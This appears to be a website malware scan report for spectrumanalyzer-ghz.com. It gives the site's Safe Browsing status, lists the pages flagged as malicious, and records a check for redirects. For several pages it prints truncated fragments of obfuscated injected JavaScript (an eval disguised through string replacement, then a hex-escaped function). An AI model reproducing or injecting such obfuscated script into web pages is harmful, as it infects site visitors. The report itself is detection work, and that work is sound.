Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=spectrumanalyzer-ghz.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://spectrumanalyzer-ghz.com/ | 200 OK Content-Length: 32893 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('wtigntdgoZwt.teZvga|lt'.replace(/[g\|#tZ]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6d\x4b\x62\x76\x28\x62\x6d\x6a\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6e\x66\x61\x70\x47\x6b\x28\x77\x77\x71\x70\x6a\x36\x6c\x29\x7b\x76\x61\x72\x20\x6f\x33\x7a\x76\x76\x66\x4d\x66\x3d\x30\x3b\x76\x61\x72\x20\x72\x38\x45\x3d\x77\x77\x71\x70\x6a\x36\x6c\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6e\x42\x48\x75\x66\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6e\x42\x48\x75\x66\x Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19470 Content-Type: text/javascript | clean |
http://spectrumanalyzer-ghz.com/index.htm | 200 OK Content-Length: 32893 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('wtigntdgoZwt.teZvga|lt'.replace(/[g\|#tZ]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6d\x4b\x62\x76\x28\x62\x6d\x6a\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6e\x66\x61\x70\x47\x6b\x28\x77\x77\x71\x70\x6a\x36\x6c\x29\x7b\x76\x61\x72\x20\x6f\x33\x7a\x76\x76\x66\x4d\x66\x3d\x30\x3b\x76\x61\x72\x20\x72\x38\x45\x3d\x77\x77\x71\x70\x6a\x36\x6c\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6e\x42\x48\x75\x66\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6e\x42\x48\x75\x66\x Antivirus reports:
| ||
http://spectrumanalyzer-ghz.com/Spectrum-Analyzer-Controls.htm | 200 OK Content-Length: 32614 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('wTizn4d4o@w@.@eTv4a@l_'.replace(/[T4_@z]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6d\x4b\x62\x76\x28\x62\x6d\x6a\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6e\x66\x61\x70\x47\x6b\x28\x77\x77\x71\x70\x6a\x36\x6c\x29\x7b\x76\x61\x72\x20\x6f\x33\x7a\x76\x76\x66\x4d\x66\x3d\x30\x3b\x76\x61\x72\x20\x72\x38\x45\x3d\x77\x77\x71\x70\x6a\x36\x6c\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6e\x42\x48\x75\x66\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6e\x42\x48\x75\x66\x3 Antivirus reports:
| ||
http://spectrumanalyzer-ghz.com/rf-spectrum-analyzer-860-DSP.htm | 200 OK Content-Length: 29406 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var jQuery = eval('w^i^nxdJoxwx.Ge^vYaYlx'.replace(/[GJ\^xY]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6d\x4b\x62\x76\x28\x62\x6d\x6a\x29\x7b\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6e\x66\x61\x70\x47\x6b\x28\x77\x77\x71\x70\x6a\x36\x6c\x29\x7b\x76\x61\x72\x20\x6f\x33\x7a\x76\x76\x66\x4d\x66\x3d\x30\x3b\x76\x61\x72\x20\x72\x38\x45\x3d\x77\x77\x71\x70\x6a\x36\x6c\x2e\x6c\x65\x6e\x67\x74\x68\x3b\x76\x61\x72\x20\x6e\x42\x48\x75\x66\x3d\x30\x3b\x77\x68\x69\x6c\x65\x28\x6e\x42\x48\x75\x66\x Antivirus reports:
| ||
http://spectrumanalyzer-ghz.com/test404page.js | 404 Not Found Content-Length: 1546 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: spectrumanalyzer-ghz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 01:01:24 GMT
Accept-Ranges: bytes
ETag: "602bbd-807d-4e49255609911"
Server: Apache
Content-Length: 32893
Content-Type: text/html
Last-Modified: Fri, 23 Aug 2013 00:17:35 GMT
...32893 bytes of data.
GET / HTTP/1.1
Host: spectrumanalyzer-ghz.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 01:01:24 GMT
Accept-Ranges: bytes
ETag: "602bbd-807d-4e49255609911"
Server: Apache
Content-Length: 32893
Content-Type: text/html
Last-Modified: Fri, 23 Aug 2013 00:17:35 GMT
...32893 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: spectrumanalyzer-ghz.com
Referer: http://www.google.com/search?q=spectrumanalyzer-ghz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: spectrumanalyzer-ghz.com
Referer: http://www.google.com/search?q=spectrumanalyzer-ghz.com
Result:
The result is similar to the first query. There are no suspicious redirects found.